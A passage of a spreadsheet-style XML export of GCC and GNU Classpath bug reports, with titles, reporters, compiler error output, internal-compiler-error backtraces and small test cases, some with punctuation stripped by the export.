test.cpp: In substitution of â€˜template decltype (~ x) foo(T) [with T = int]â€™:
test.cpp:6:16:   required from here
test.cpp:2:6: error: â€˜xâ€™ was not declared in this scope
test.cpp:6:19: error: control reaches end of non-void function [-Werror=return-type]
 { return foo(10) }
                   ^
cc1plus: all warnings being treated as errors
This is specific to the unary operator ~ and expression involving argument name (not its type). All the following variants compile well for instance:
template
auto foo(T x) -&gt; decltype(!x)
{ return !x }
template
auto foo(T x) -&gt; decltype(-x)
{ return -x }
template
auto foo(T x) -&gt; decltype(+x)
{ return +x }
template
auto foo(T x) -&gt; decltype(~T())
{ return ~x }
My gcc is:
ptomulik@tea:$ g++ --version
g++-4.9.real (Debian 4.9.2-10) 4.9.2
Copyright (C) 2014 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
My OS is Debian 8.0.</t>
  </si>
  <si>
    <t>ptomulik</t>
  </si>
  <si>
    <t>GCC-70406</t>
  </si>
  <si>
    <t>ICE: in extract_insn at recog.c:2287 (unrecognizable insn) with -mtune=pentium2 -mavx512f</t>
  </si>
  <si>
    <t>Compiler output:
$ i686-pc-linux-gnu-gcc -O -mtune=pentium2 -mavx512f testcase.c 
testcase.c: In function 'foo':
testcase.c:9:1: error: unrecognizable insn:
 }
 ^
(insn 39 33 40 2 (set (reg/v:QI 1 dx [orig:89 i ] [89])
        (not:HI (reg/v:QI 1 dx [orig:89 i ] [89]))) testcase.c:6 -1
     (nil))
testcase.c:9:1: internal compiler error: in extract_insn at recog.c:2287
0xb37078 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /repo/gcc-trunk/gcc/rtl-error.c:108
0xb37108 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /repo/gcc-trunk/gcc/rtl-error.c:116
0xaec618 extract_insn(rtx_insn*)
        /repo/gcc-trunk/gcc/recog.c:2287
0xaec6c7 extract_insn_cached(rtx_insn*)
        /repo/gcc-trunk/gcc/recog.c:2178
0x85140d cleanup_subreg_operands(rtx_insn*)
        /repo/gcc-trunk/gcc/final.c:3104
0xae7ffa split_insn
        /repo/gcc-trunk/gcc/recog.c:2901
0xaf03e7 split_all_insns()
        /repo/gcc-trunk/gcc/recog.c:2955
0xaf04d8 rest_of_handle_split_after_reload
        /repo/gcc-trunk/gcc/recog.c:3891
0xaf04d8 execute
        /repo/gcc-trunk/gcc/recog.c:3920
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
trunk r234391 - FAIL
5-branch r234412 - FAIL
4_9-branch r234243 - FAIL</t>
  </si>
  <si>
    <t>GCC-4553</t>
  </si>
  <si>
    <t>Segmentation fault</t>
  </si>
  <si>
    <t>When build cross g++ for h8300 or cygwin:
from gcc -v
 /usr/src/gcc/xh8300/gcc/as -o eh_personality.o
ignoring nonexistent directory /usr/src/gcc/xh8300/h8300-hms/newlib/include
ignoring nonexistent directory /usr/local/h8300gcc/h8300-hms/bin/include
ignoring nonexistent directory /usr/local/h8300gcc/h8300-hms/lib/include
ignoring nonexistent directory /usr/local/h8300gcc/h8300-hms/include
GNU CPP version 3.0.1 (cpplib) (Hitachi H8/300)
GNU C++ version 3.0.1 (h8300-hms)
	compiled by GNU C version 3.0.1.
#include ... search starts here:
#include  search starts here:
 /usr/src/gcc/src/libstdc++-v3/../gcc
 /usr/src/gcc/src/libstdc++-v3/../include
 /usr/src/gcc/xh8300/h8300-hms/libstdc++-v3/include/h8300-hms
 /usr/src/gcc/xh8300/h8300-hms/libstdc++-v3/include
 /usr/src/gcc/src/libstdc++-v3/libsupc++
 /usr/src/gcc/xh8300/gcc/include
 /usr/src/gcc/xh8300/h8300-hms/newlib/targ-include
 /usr/src/gcc/src/newlib/libc/include
End of search list.
/usr/src/gcc/src/libstdc++-v3/libsupc++/eh_personality.cc: In function `void 
   __cxa_call_unexpected(_Unwind_Exception*)':
/usr/src/gcc/src/libstdc++-v3/libsupc++/eh_personality.cc:441: Internal error: 
   Segmentation fault
Release:
gcc version 3.0.1 with Kazu Hirata path from 2001-09-25
Environment:
Reading specs from /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/specs
Configured with: /usr/src/gcc/gcc-3.0.1/configure --with-gcc-version-trigger=/usr/src/gcc/gcc-3.0.1/gcc/version.c --host=i686-pc-linux-gnu --with-gnu-as --with-gnu-ld --enable-languages=cc++ --prefix=/usr/local/gcc
Thread model: single
gcc version 3.0.1
How-To-Repeat:
just try build gcc with enabled libstdc++</t>
  </si>
  <si>
    <t>avolkov</t>
  </si>
  <si>
    <t>GCC-62238</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE with LTO on valid code on x86_64-linux-gnu in verify_ssa (in 64-bit mode)</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk (as well as 4.9.x) with LTO on x86_64-linux-gnu in 64-bit mode (but not in 32-bit mode).
It is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 5.0.0 20140823 (experimental) [trunk revision 214394] (GCC) 
$ 
$ gcc-trunk -O0 -c fn1.c
$ gcc-trunk -O0 -c main.c
$ gcc-trunk -O3 *.o
$ ./a.out
$ 
$ gcc-4.8 -flto -O0 -c fn1.c
$ gcc-4.8 -flto -O0 -c main.c
$ gcc-4.8 -flto -O3 *.o
$ ./a.out
$ 
$ gcc-trunk -flto -O0 -c fn1.c
$ gcc-trunk -flto -O0 -c main.c
$ gcc-trunk -flto -O3 *.o
fn1.c: In function â€˜fn1â€™:
fn1.c:4:1: error: missing definition
 fn1 (int p)
 ^
for SSA_NAME: _73 in statement:
_32 = (unsigned int) _73
fn1.c:4:1: internal compiler error: verify_ssa failed
0xab6be1 verify_ssa(bool bool)
	../../gcc-trunk/gcc/tree-ssa.c:1055
0x830f4b execute_function_todo
	../../gcc-trunk/gcc/passes.c:1758
0x831a23 execute_todo
	../../gcc-trunk/gcc/passes.c:1808
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: gcc-trunk returned 1 exit status
compilation terminated.
/usr/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
$ 
$ cat fn1.c
int a[4] b c d 
int
fn1 (int p)
{
  for ( d d++)
    {
      unsigned int h
      for (h = 0 h &lt; 3 h++)
	{
	  if (a[c+c+h])
	    {
	      if (p)
		break
	      return 0
	    }
	  b = 0
	}
    }
  return 0
}
$ cat main.c
extern int fn1 (int)
int
main ()
{
  fn1 (0)
  return 0
}
$</t>
  </si>
  <si>
    <t>GCC-18423</t>
  </si>
  <si>
    <t>[4.0 Regression] powerpc-eabisim build broken due to configure skipping fixincludes</t>
  </si>
  <si>
    <t>There was a change to configure proposed by Paolo Bonzini in September
checked into configure.in by Aaron LaFramboise in October and configure
(when it was regenerated to include his own patch) by HJ Lu in November
that prevents fixincludes from being built for powerpc-eabisim causing
a build for that target as described in simtest-howto.html to fail.
The following hack to configure fixes it but I don't know if it's
appropriate to skip libgcj for that target:
Index: configure.in
===================================================================
RCS file: /opt/gcc-cvs/gcc/configure.inv
retrieving revision 1.331
diff -u -p -r1.331 configure.in
--- configure.in        8 Nov 2004 01:27:56 -0000       1.331
+++ configure.in        11 Nov 2004 00:38:11 -0000
@@ -6836 +6839 @@ case ${target} in
   powerpc-*-eabi)
     noconfigdirs=$noconfigdirs ${libgcj} build-fixincludes
+  powerpc-*-eabisim)
+    noconfigdirs=$noconfigdirs ${libgcj}
+    
   powerpc-*-eabi* | powerpcle-*-eabi* | powerpc-*-rtems* )
     noconfigdirs=$noconfigdirs build-fixincludes
I submitting this as a problem report rather than as a patch because I don't
know what's going on here at all and would like someone who understands
this stuff to take a look at it.
The bug exists in today's mainline and is a regression.</t>
  </si>
  <si>
    <t>CLASSPATH-28369</t>
  </si>
  <si>
    <t>BufferedImage.getRGB returns bad pixel data</t>
  </si>
  <si>
    <t>In some cases BufferedImage.getRGB() returns pixel data in ABGR order
instead of ARGB order. 
Testcase attached see the log below for some sample output (linux x86)
and the corresponding output from the reference implementation. jamvm
claims DirectColorModel both for the initial and the converted image
but the pixel data is ABGR.
Note that the two-step approach (first loading via toolkit then converting
to buffered image) is required because the RI returns a non-buffered image
from Toolkit.createImage() and I need a BufferedImage to access the raw
pixels.
Using ImageIO.read() might be a better option but ImageIO tended to be
very slow on classpath and extremely slow for certain images on the RI.
jamvm niffler.GetRGBTest images/screen-araucaria.gif 
Image is: BufferedImage@40a696c8: type=0 java.awt.image.DirectColorModel[pixel_bits=32 cspace=java.awt.color.ICC_ColorSpace@40880ff0 transferType=3 transparency=3 hasAlpha=true isAlphaPremultiplied=false redMask=ff greenMask=ff00 blueMask=ff0000 alphaMask=ff000000] java.awt.image.WritableRaster[(00) 829 x 600java.awt.image.SinglePixelPackedSampleModel[scanlineStride=829 mask[0]=0xff mask[1]=0xff00 mask[2]=0xff0000 mask[3]=0xff000000]gnu.java.awt.peer.gtk.CairoSurface@408832b0]
BufferedImage is: BufferedImage@40a696c8: type=0 java.awt.image.DirectColorModel[pixel_bits=32 cspace=java.awt.color.ICC_ColorSpace@40880ff0 transferType=3 transparency=3 hasAlpha=true isAlphaPremultiplied=false redMask=ff greenMask=ff00 blueMask=ff0000 alphaMask=ff000000] java.awt.image.WritableRaster[(00) 829 x 600java.awt.image.SinglePixelPackedSampleModel[scanlineStride=829 mask[0]=0xff mask[1]=0xff00 mask[2]=0xff0000 mask[3]=0xff000000]gnu.java.awt.peer.gtk.CairoSurface@408832b0]
RGB[00] = 255 100 50 180
RGB[2713] = 255 156 102 52
RGB[599828] = 255 252 253 251
java niffler.GetRGBTest images/screen-araucaria.gif 
Image is: sun.awt.motif.X11Image@1ad77a7
-I- getBufferedImage took 43 msec.
BufferedImage is: BufferedImage@72ffb: type = 1 DirectColorModel: rmask=ff0000 gmask=ff00 bmask=ff amask=0 IntegerInterleavedRaster: width = 829 height = 600 #Bands = 3 xOff = 0 yOff = 0 dataOffset[0] 0
RGB[00] = 255 180 50 100
RGB[2713] = 255 52 102 156
RGB[599828] = 255 251 253 252</t>
  </si>
  <si>
    <t>GCC-81175</t>
  </si>
  <si>
    <t>[7 Regression] EXC_BAD_ACCESS in ::slpeel_duplicate_current_defs_from_edges(edge edge edge edge) at is-a.h:192</t>
  </si>
  <si>
    <t>Created attachment 41611
Archive with the source file(fortran) Makefile compilation output and the assembly output file
During the compilation of a program gfortran makes internal compiler error: Segmentation fault It is jast normal fortran program that can be compiled without any problems with the older versions of gcc.
It hapens on
AMD Ryzen 7 1800X Eight-Core Processor
Intel(R) Xeon(R) CPU E5-2630 v4 @ 2.20GHz
it does not hapen on
Intel(R) Xeon Phi(TM) CPU 7210 @ 1.30GHz
If the option -fno-unsafe-math-optimizations is added everything is fine no segmentation fault occurs.</t>
  </si>
  <si>
    <t>noskovs</t>
  </si>
  <si>
    <t>GCC-80580</t>
  </si>
  <si>
    <t>GIMPLEFE ICE on invalid code (fuzz testing)</t>
  </si>
  <si>
    <t>Created attachment 41290
test cases
I did some fuzz testing of the GIMPLE front end and found several ICEs.
I realize that GIMPLE FE is intended for internal use in the GCC test suite so the requirements for its robustness are not as high as for the user-facing front ends. Nevertheless I think correct handling of erroneous input would be useful for reducing GIMPLE code of real-world bug reports in the future (because tools like C-Reduce tend to generate lots of erroneous intermediate inputs).
I used a technique created by John Regehr which is described in his blog http://blog.regehr.org/archives/1284 to generate these test cases. Kudos to John.
There are 46 test cases in the archive and they all produce ICEs with distinct backtraces. Although they seem to be different bugs I decided not to file 46 bug reports :).
Example: 
$ cat test001.c
__GIMPLE a() {
  if
  goto
$ cc1 -fgimple -w test001.c
test001.c: In function 'a':
test001.c:3:3: error: expected '(' before 'goto'
   goto
   ^~~~
test001.c:3:3: internal compiler error: Segmentation fault
0xbde80f crash_signal
        /home/miyuki/gcc/src/gcc/toplev.c:337
0x62d467 tree_check
        /home/miyuki/gcc/src/gcc/tree.h:3076
0x62d467 i_label_binding
        /home/miyuki/gcc/src/gcc/c/c-decl.c:289
0x62d467 lookup_label(tree_node*)
        /home/miyuki/gcc/src/gcc/c/c-decl.c:3567
0x62d624 lookup_label_for_goto(unsigned int tree_node*)
        /home/miyuki/gcc/src/gcc/c/c-decl.c:3615
0x6b9adf c_parser_gimple_if_stmt
        /home/miyuki/gcc/src/gcc/c/gimple-parser.c:1318
0x6b9adf c_parser_gimple_compound_statement
        /home/miyuki/gcc/src/gcc/c/gimple-parser.c:172
0x6b9adf c_parser_parse_gimple_body(c_parser*)
        /home/miyuki/gcc/src/gcc/c/gimple-parser.c:92
0x6a2b2b c_parser_declaration_or_fndef
        /home/miyuki/gcc/src/gcc/c/c-parser.c:2104
0x6aa913 c_parser_external_declaration
        /home/miyuki/gcc/src/gcc/c/c-parser.c:1469
0x6ab1d1 c_parser_translation_unit
        /home/miyuki/gcc/src/gcc/c/c-parser.c:1349
0x6ab1d1 c_parse_file()
        /home/miyuki/gcc/src/gcc/c/c-parser.c:18181
0x708582 c_common_parse_file()
        /home/miyuki/gcc/src/gcc/c-family/c-opts.c:1107
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
P.S. I have a patch series to fix some of these bugs. I am planning to rebase retest and post these patches soon.</t>
  </si>
  <si>
    <t>GCC-48173</t>
  </si>
  <si>
    <t>[4.6 regression] bootstrap error on arm-linux-gnueabi (defaulting to armv4t)</t>
  </si>
  <si>
    <t>according to
https://buildd.debian.org/fetch.cgi?pkg=gcc-4.6&amp;arch=armel&amp;ver=4.6.0~rc1-1&amp;stamp=1300253746&amp;file=log&amp;as=raw
the bootstrap build fails with:
/build/buildd-gcc-4.6_4.6.0~rc1-1-armel-5jpjEr/gcc-4.6-4.6.0~rc1/build/./prev-gcc/xgcc -B/build/buildd-gcc-4.6_4.6.0~rc1-1-armel-5jpjEr/gcc-4.6-4.6.0~rc1/build/./prev-gcc/ -B/usr/arm-linux-gnueabi/bin/ -B/usr/arm-linux-gnueabi/bin/ -B/usr/arm-linux-gnueabi/lib/ -isystem /usr/arm-linux-gnueabi/include -isystem /usr/arm-linux-gnueabi/sys-include    -c   -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wc++-compat  -Wno-error -DHAVE_CONFIG_H -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/../include -I../../src/gcc/../libcpp/include  -I../../src/gcc/../libdecnumber -I../../src/gcc/../libdecnumber/dpd -I../libdecnumber    ../../src/gcc/expmed.c -o expmed.o
../../src/gcc/expmed.c: In function 'init_expmed':
../../src/gcc/expmed.c:134:3: warning: array subscript is above array bounds [-Warray-bounds]
xgcc: internal compiler error: Segmentation fault (program cc1)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [expmed.o] Error 4
make[5]: Leaving directory `/build/buildd-gcc-4.6_4.6.0~rc1-1-armel-5jpjEr/gcc-4.6-4.6.0~rc1/build/gcc'
make[4]: *** [all-stage2-gcc] Error 2
make[4]: Leaving directory `/build/buildd-gcc-4.6_4.6.0~rc1-1-armel-5jpjEr/gcc-4.6-4.6.0~rc1/build'
make[3]: *** [stage2-bubble] Error 2
make[3]: Leaving directory `/build/buildd-gcc-4.6_4.6.0~rc1-1-armel-5jpjEr/gcc-4.6-4.6.0~rc1/build'
make[2]: *** [bootstrap-lean] Error 2
make[2]: Leaving directory `/build/buildd-gcc-4.6_4.6.0~rc1-1-armel-5jpjEr/gcc-4.6-4.6.0~rc1/build'
s=`cat status` rm -f status test $s -eq 0
make[1]: *** [stamps/05-build-stamp] Error 1
configured as:
--enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib  --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-gold --enable-ld=default --with-plugin-ld=ld.gold --enable-objc-gc --disable-sjlj-exceptions --enable-checking=release --build=arm-linux-gnueabi --host=arm-linux-gnueabi --target=arm-linux-gnueabi
and the patch:
--- a/src/gcc/config/arm/linux-eabi.h
+++ b/src/gcc/config/arm/linux-eabi.h
@@ -447 +447 @@
    The ARM10TDMI core is the default for armv5t so set
    SUBTARGET_CPU_DEFAULT to achieve this.  */
 #undef  SUBTARGET_CPU_DEFAULT
-#define SUBTARGET_CPU_DEFAULT TARGET_CPU_arm10tdmi
+#define SUBTARGET_CPU_DEFAULT TARGET_CPU_arm9tdmi
 /* TARGET_BIG_ENDIAN_DEFAULT is set in
    config.gcc for big endian configurations.  */</t>
  </si>
  <si>
    <t>GCC-9704</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] miscompilation of classes with bit fields</t>
  </si>
  <si>
    <t>The below testcase is miscompiled and this affects openoffice.
This is the case since september last year (i.e. in 3.3 and HEAD).
---------------- snip -----------------
struct BOOL {
    int nVal:1 bSet:1
    BOOL (int i) : nVal(i!=0) bSet(1) {}
}
struct Fill {
    void *d
    Fill() : d(0) {}
    Fill( const Fill&amp; ) {}
}
struct SvMetaSlot {
    Fill aGroupId
#ifdef OUTLINE_CCTOR
    BOOL a1 BOOL a2 BOOL a3 BOOL a4 BOOL a5 BOOL a6 BOOL a7
#endif
    BOOL a8
    SvMetaSlot() :
#ifdef OUTLINE_CCTOR
      a1(0) a2(0) a3(0) a4(0) a5(0) a6(0) a7(0)
#endif
      a8(1) {}
    SvMetaSlot* MakeClone() const
}
SvMetaSlot* SvMetaSlot::MakeClone() const { return new SvMetaSlot( *this ) }
extern C void abort(void)
int main()
{
  SvMetaSlot s SvMetaSlot s2(s)
  if (s.a8.bSet != s2.a8.bSet)
    abort ()
  return 0
}
-------------- snap -------------
Compile it with -O1 (or -O2) and see it abort.  When
-DOUTLINE_CCTOR is given the implicit cctor of SvMetaSlot
is created in an out-of-line copy so it can be analyzed easier.
If it's not given the cctor in inlined into the MakeClone()
method but the outcome is the same.  Note how the BOOL class
uses just bitfield members.
What happens is that all the BOOL members of SvMetaSlot are
not copied in the synthetic copy ctor.  There is no RTL
generated for copying those members for instance the
assembler output for the out-of-line copy on i686 is:
SvMetaSlot::SvMetaSlot[in-charge](SvMetaSlot const&amp;):
        pushl   %ebp
        movl    %esp %ebp
        popl    %ebp
        ret
The miscompile happens with cvs -D2002-09-30 19:00 but not
with -D2002-09-30 18:21 and the only patch during that period
is Marks:
+2002-09-30  Mark Mitchell  
+
+       * class.c (walk_subobject_offsets): Correct the calculation of
+       offsets for virtual bases.  Correct the counting of array
+       elements.
+       (layout_nonempty_base_or_field): Simplify.  Correct the
+       calculation of offsets to be propagated through the binfo
+       hierarchy.
+       (build_base_field): Avoid creating a FIELD_DECL for empty bases.
+ ....
Release:
3.3 20030123 CVS and HEAD
Environment:
i686-linux
How-To-Repeat:
Compile the above testcase with g++ (no matter what -O option)
on i686-linux (x86-64 breaks too) run it.  It will abort.</t>
  </si>
  <si>
    <t>CLASSPATH-27632</t>
  </si>
  <si>
    <t>Missing class java.util.concurrent.Executors</t>
  </si>
  <si>
    <t>When trying to run the latest version of the josm java program it
throws 'java.lang.NoClassDefFoundError: java/util/concurrent/Executors' from
org.openstreetmap.josm.Main.(Main.java:67).  The class seem to
be missing from GNU Classpath.
This is the output I get
  % jamvm -jar josm-latest.jar
  java.lang.NoClassDefFoundError: java/util/concurrent/Executors
     at org.openstreetmap.josm.Main.(Main.java:67)
     at java.lang.VMClass.forName(Native Method)
     at java.lang.Class.forName(Class.java:235)
     at jamvm.java.lang.JarLauncher.main(JarLauncher.java:47)
  Caused by: java.lang.ClassNotFoundException: java.util.concurrent.Executors not found in java.lang.ClassLoader$1{urls=[file:/home/pere/src/debian/java/josm-latest.jar] parent=null}
     at java.net.URLClassLoader.findClass(URLClassLoader.java:558)
     at java.lang.ClassLoader.loadClass(ClassLoader.java:342)
     at java.lang.ClassLoader$1.loadClass(ClassLoader.java:1112)
     at java.lang.ClassLoader.loadClass(ClassLoader.java:294)
     at org.openstreetmap.josm.Main.(Main.java:67)
     ...3 more
  %
I find the class described in
.
The josm java program source is available from
.</t>
  </si>
  <si>
    <t>GCC-37234</t>
  </si>
  <si>
    <t>[c++0x] =default definition outside template class fails</t>
  </si>
  <si>
    <t>This is about this problem report:
  http://gcc.gnu.org/ml/gcc/2008-08/msg00394.html</t>
  </si>
  <si>
    <t>GCC-44302</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 159949 failed to bootstrap:
gcc-test/src-trunk/libobjc/objc/Object.h:29:0
                 from /export/gnu/import/svn/gcc-test/src-trunk/libobjc/linking.m:27:
/export/gnu/import/svn/gcc-test/src-trunk/libobjc/objc/objc.h:72:1: internal compiler error: in add_byte_size_attribute at dwarf2out.c:16990
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [linking.lo] Error 1
Revision 159936 is OK.</t>
  </si>
  <si>
    <t>GCC-13681</t>
  </si>
  <si>
    <t>[tree-ssa] ICE in get_expr_operands with out-of-bounds access</t>
  </si>
  <si>
    <t>Seems like tree-ssa is getting too good at optimizing :-) 
Here's an out-of-bounds access that ICEs tree-ssa: 
---------------------------- 
struct X { 
    double values[1] 
    double &amp; foo (const unsigned int index) 
      { return values[index] } 
} 
void foo() { 
  double d 
  X h1 
  h1.foo(1) = d 
} 
------------------------- 
Note that if I call h1.foo(0) then everything is fine since we 
stay inside the bounds of the values array. However with the code 
as shown we get 
deal.II/base&gt; c++ -c -O2 x.cc 
x.cc: In function `void foo()': 
x.cc:8: internal compiler error: in get_expr_operands at 
tree-ssa-operands.c:918 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
This is with yesterday's tree-ssa branch. I hope it will be reasonable 
simple to fix since this is the last ICE I presently get with tree-ssa 
and if it is fixed I'll switch on a nightly tester for tree-ssa that 
compiles our library. I can then also finally try to run the generated 
code and find all those code-gen bugs :-) 
Thanks 
  W.</t>
  </si>
  <si>
    <t>GCC-26509</t>
  </si>
  <si>
    <t>incorrect behaviour of error-handler for direct access write</t>
  </si>
  <si>
    <t>dear people
the following test code gives some unexpected results:
program dummy
  character(len=100) :: a
  integer :: iios
  i=777
  a(:) = ' '
  read(a*err=999) i
  print *i=i
  i=666
  read(a*iostat=ios) i
  print *i=i
  IF (ios .ne. 0) print *read error: ios=ios
  stop
999 print *read error occurred
end program dummy
The test program should jump to label 999 as soon as the first read statement fails. (or is this not part of the standard? seems unlikely but I am no expert on that).
However the program stops with a runtime error.
The iostat error handler in the next read statement by the way does work correct.
My screen output is: 
&gt;gfortran -o dummy dummy.F90
&gt;dummy
At line 7 of file dummy.F90
Fortran runtime error: End of file
&gt;
The gfortran version used for testing was:
&gt;gfortran -v
Using built-in specs.
Target: i386-linux
Configured with: ../gcc/configure --prefix=/cosmic/coudert/tmp/gfortran-20060301/irun --enable-languages=cfortran --host=i386-linux --with-gmp=/cosmic/coudert/tmp/gfortran-20060301/gfortran_libs
Thread model: posix
gcc version 4.2.0 20060228 (experimental)
&gt;
best regards
Jos de Kloe</t>
  </si>
  <si>
    <t>GCC-14413</t>
  </si>
  <si>
    <t>[tree-ssa] ICE caused by tree-ssa-phiopt not unsetting EDGE_FALSE</t>
  </si>
  <si>
    <t>I found this while trying to add some more optimizations to tree-ssa-phiopt.c and trying to 
fix PR14135 at the same time.
void abort(void)
int x y
void init_xy(void)
void
test4(void)
{
  init_xy()
  _Bool iftemp0
  int x1 = x
  _Bool iftemp1
  x1++
  if (x1 != 3)
    {
      iftemp1 = 1
      goto endfirstif
    }
  iftemp1 = 0
  endfirstif:
  iftemp0 = iftemp1
  if (iftemp0)
    abort()
}</t>
  </si>
  <si>
    <t>GCC-25385</t>
  </si>
  <si>
    <t>ICE in gfc_conv_ss_descriptor at fortran/trans-array.c:1235</t>
  </si>
  <si>
    <t>I havent verified this on any newer builds due to lack of resources.
gfortran -v -save-temps -fPIC -pipe -fno-second-underscore -Wall -W -o matiere.o matiere.f
Driving: gfortran -v -save-temps -fPIC -pipe -fno-second-underscore -Wall -W -o matiere.o matiere.f -lgfortranbegin -lgfortran -lm -shared-libgcc
gfortran: warning: -pipe ignored because -save-temps specified
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++javaf95objcadatreelang --prefix=/usr --with-gxx-include-dir=/usr/include/c++/4.0.2 --enable-shared --with-system-zlib --libexecdir=/usr/lib --enable-nls --without-included-gettext --enable-threads=posix --program-suffix=-4.0 --enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-mpfr --disable-werror --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9)
 /usr/lib/gcc/i486-linux-gnu/4.0.2/f951 matiere.f -ffixed-form -quiet -dumpbase matiere.f -mtune=i486 -auxbase matiere -Wall -W -version -fPIC -fno-second-underscore -o matiere.s
GNU F95 version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9) (i486-linux-gnu)
        compiled by GNU C version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
matiere.f: In function 'matiere':
matiere.f:1425: internal compiler error: in gfc_conv_ss_descriptor at fortran/trans-array.c:1235</t>
  </si>
  <si>
    <t>ake.sandgren</t>
  </si>
  <si>
    <t>CLASSPATH-23678</t>
  </si>
  <si>
    <t>JFileChooser's header gets scrambled with long directory names</t>
  </si>
  <si>
    <t>JFileChooser's header gets scrambled when the Look In JCombobox list includes
a directory with a long filename.  To see the results simply create a directory
thisisareallylongdirectoryname on your system open a JFileChooser and browse
to that directory.
The problem is fairly practical because a directory as short as classpath
caused the problem on my system with the default JFileChooser window size.</t>
  </si>
  <si>
    <t>GCC-41149</t>
  </si>
  <si>
    <t>-fdump-tree-original and procedure pointer components</t>
  </si>
  <si>
    <t>There seems to be a bug in the tree dump related to procedure pointer components ('PPC' a Fortran 2003 feature which would probably be described as function pointers as structure components in C). In particular: When calling such a PPC the dump only shows the component name while the name of the object which contains the component is omitted. This is not language dependent and is also observed for C code as the following example shows:
#include 
typedef long funcPtr(char *)
long func(char * str)
{
  printf(%s\n str)
  return 0
}
int main(void)
{
  long l
  struct
  {
    funcPtr *ppc
  } t
  t.ppc = func
  l = t.ppc(Hello)
  return l
}
The dump shows (with -fdump-tree-original):
  t.ppc = (long int (*) (char *)) func
  l = ppc ((char *) Hello)
In the second line I would expect to see 't.ppc' instead of just 'ppc'.
For a Fortran example see PR 41139.</t>
  </si>
  <si>
    <t>GCC-8231</t>
  </si>
  <si>
    <t>iostream header position causes bad code generation</t>
  </si>
  <si>
    <t>If  is included in different places the generated code changes and dumps core due to stack
overflow. Moving the #include to before the definition of A::print (see attached file) causes proper behaviour.
Inspection of the generated assemly code shows significant differences between the two cases (ask and I'll send the two .s files).
Same behviour with 3.1. version 2.95.3 20010315 (release) [FreeBSD] is fine
Release:
gcc version 3.2
Environment:
Reading specs from /usr/local/gcc-3.2/lib/gcc-lib/i386-unknown-freebsd4.6/3.2/specs
Configured with: ../gcc-3.2/configure --prefix=/usr/local/gcc-3.2 --disable-threads --enable-languages=cc++
Thread model: single
gcc version 3.2
How-To-Repeat:
/usr/local/gcc-3.2/bin/c++ ipv4addr.cc
./a.out
Segmentation fault (core dumped)</t>
  </si>
  <si>
    <t>brister</t>
  </si>
  <si>
    <t>GCC-15645</t>
  </si>
  <si>
    <t>[3.3 only]stringstream/ostream/iomanip memory scribble bug</t>
  </si>
  <si>
    <t>This bug causes a segfault in my full application.This testcase does not crash 
but it does cause Valgrind to complain. 
Testcase built with gcc -lstdc++ test.cpp: 
        #include  
        #include  
        using namespace std 
        int main() 
        { 
                 ostringstream oss 
                 oss &lt;&lt; internal &lt;&lt; setw(2) &lt;&lt; 0 
        } 
Interestingly the '0' triggers the behaviour. Substitute a non-zero number and 
it runs without incident. 
andrew@bob andrew $ valgrind --tool=memcheck a.out 
==296== Memcheck a memory error detector for x86-linux. 
==296== Copyright (C) 2002-2004 and GNU GPL'd by Julian Seward. 
==296== Using valgrind-2.1.1 a program supervision framework for x86-linux. 
==296== Copyright (C) 2000-2004 and GNU GPL'd by Julian Seward. 
==296== For more details rerun with: -v 
==296== 
==296== Conditional jump or move depends on uninitialised value(s) 
==296==    at 0x3C07D9A6: std::__pad 
&gt;::_S_pad(std::ios_base&amp; char char* char const* int int bool) 
(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296==    by 0x3C07DA83: std::num_put&lt;char std::ostreambuf_iterator&lt;char 
std::char_traits &gt; &gt;::_M_pad(char int std::ios_base&amp; char* char 
const* int&amp;) const 
